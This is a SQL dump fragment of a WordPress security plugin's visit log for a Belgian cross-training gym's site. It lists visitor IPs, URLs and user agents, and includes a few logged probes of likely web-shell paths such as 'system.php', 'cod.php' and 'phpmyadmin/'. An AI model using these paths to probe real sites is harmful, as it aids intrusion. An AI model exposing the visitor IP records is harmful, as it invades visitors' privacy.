(74589, 1496688946.960683, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74590, 1496688947.529464, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74591, 1496688947.994823, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74592, 1496688948.507158, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74593, 1496688948.946848, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74594, 1496688949.506334, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74595, 1496688950.010913, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74596, 1496688950.704077, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74597, 1496688951.225889, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74598, 1496688951.794880, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74599, 1496688952.330526, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74600, 1496701104.406325, 1357743298, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentytwelve/system.php', 'http://crosstrainingcenter.be/wp-content/themes/twentytwelve/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74601, 1496702223.210728, 3328203529, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74602, 1496704024.523063, 676177770, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74603, 1496704025.972562, 676177770, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74604, 1496706067.146960, 3024883487, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74605, 1496714426.127584, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(74606, 1496717196.690821, 1137866330, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/wflogs/rules.php', 'http://crosstrainingcenter.be/wp-content/wflogs/rules.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74607, 1496741073.929234, 2644818921, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwi4pZ_w8qjUAhWEvRQKHUcpCNIQFggkMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=lQ6mKjX6Bg9tNrWxeqJc5Q', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74608, 1496741075.693185, 2644818921, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74609, 1496741086.990311, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74610, 1496741090.847397, 2644818921, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74611, 1496741096.002859, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74612, 1496741105.364144, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74613, 1496741109.429707, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74614, 1496741118.597982, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74615, 1496741126.867767, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74616, 1496741373.700593, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74617, 1496741380.757156, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74618, 1496741398.391537, 2644818921, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(74619, 1496744968.651626, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74620, 1496748189.070722, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74621, 1496752895.506944, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi5iqSDn6nUAhUEb1AKHdZqCakQFggoMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=TgoawH5lUTYNL5oczZSGaQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(74622, 1496752900.263777, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(74623, 1496752900.731236, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74624, 1496755767.629279, 2071806883, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(74625, 1496757695.470960, 2071806944, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(74626, 1496757695.569280, 2071807790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74627, 1496758088.536773, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74628, 1496758088.537965, 2637637426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74629, 1496760652.553827, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74630, 1496760866.272298, 1463941451, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9'),
(74631, 1496764223.379541, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74632, 1496764609.067401, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74633, 1496771017.647407, 2366148111, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74634, 1496773560.700506, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74635, 1496774401.998394, 1427778051, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74636, 1496774405.540327, 1427778051, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74637, 1496775650.650414, 3652617456, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74638, 1496775746.483499, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74639, 1496775747.178517, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74640, 1496775747.821725, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74641, 1496775748.319654, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74642, 1496775748.788957, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74643, 1496775749.327571, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74644, 1496775749.926306, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74645, 1496775750.455426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74646, 1496775750.966162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74647, 1496775751.444162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74648, 1496775751.934233, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74649, 1496787245.195284, 3250485790, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'android-app://com.google.android.googlequicksearchbox', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74650, 1496787247.378758, 3250485790, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A520F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(74651, 1496787354.188292, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74652, 1496789886.078403, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74653, 1496796873.315471, 1581879465, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/mtsah16837.txt', '', 'Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)'),
(74654, 1496798091.945571, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74655, 1496801362.806035, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74656, 1496801363.426614, 2637637388, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74657, 1496801692.871731, 1600967944, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74658, 1496801696.560929, 2996488237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/prix/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74659, 1496806718.836879, 1338305248, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74660, 1496811439.975305, 2637637439, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74661, 1496825737.998222, 3475901784, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74662, 1496831081.544807, 872366395, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74663, 1496832712.305939, 2493725349, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/phpmyadmin/', '', ''),
(74664, 1496835157.447455, 2303381350, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74665, 1496837446.750373, 872366375, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74666, 1496840281.971221, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74667, 1496840282.510468, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74668, 1496843031.887489, 1123631811, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74669, 1496843032.906375, 1123631626, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74670, 1496843663.721988, 1519853770, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/cod.php', 'http://crosstrainingcenter.be/cod.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74671, 1496846612.847991, 1439241202, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.ecosia.org/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74672, 1496846614.796752, 1439241202, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74673, 1496846624.731205, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74674, 1496846643.116404, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74675, 1496846643.855634, 1439241202, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74676, 1496850319.354961, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(74677, 1496850319.884684, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74678, 1496850320.447718, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74679, 1496850321.017462, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74680, 1496850321.526643, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74681, 1496850322.018363, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74682, 1496850322.465119, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74683, 1496850323.005434, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74684, 1496850323.444915, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74685, 1496850323.893955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74686, 1496850324.367161, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74687, 1496850324.874793, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74688, 1496850325.299983, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74689, 1496850325.727759, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(74690, 1496859286.226500, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74691, 1496859962.522996, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74692, 1496859963.240807, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74693, 1496859963.734195, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74694, 1496859964.193296, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74695, 1496859964.638049, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74696, 1496859965.113780, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74697, 1496859965.654242, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74698, 1496859966.134548, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74699, 1496859966.772241, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74700, 1496859967.224818, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74701, 1496859967.745518, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74702, 1496860611.901354, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74703, 1496861216.108762, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74704, 1496861570.968446, 2637637378, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74705, 1496861779.175538, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74706, 1496862328.578117, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
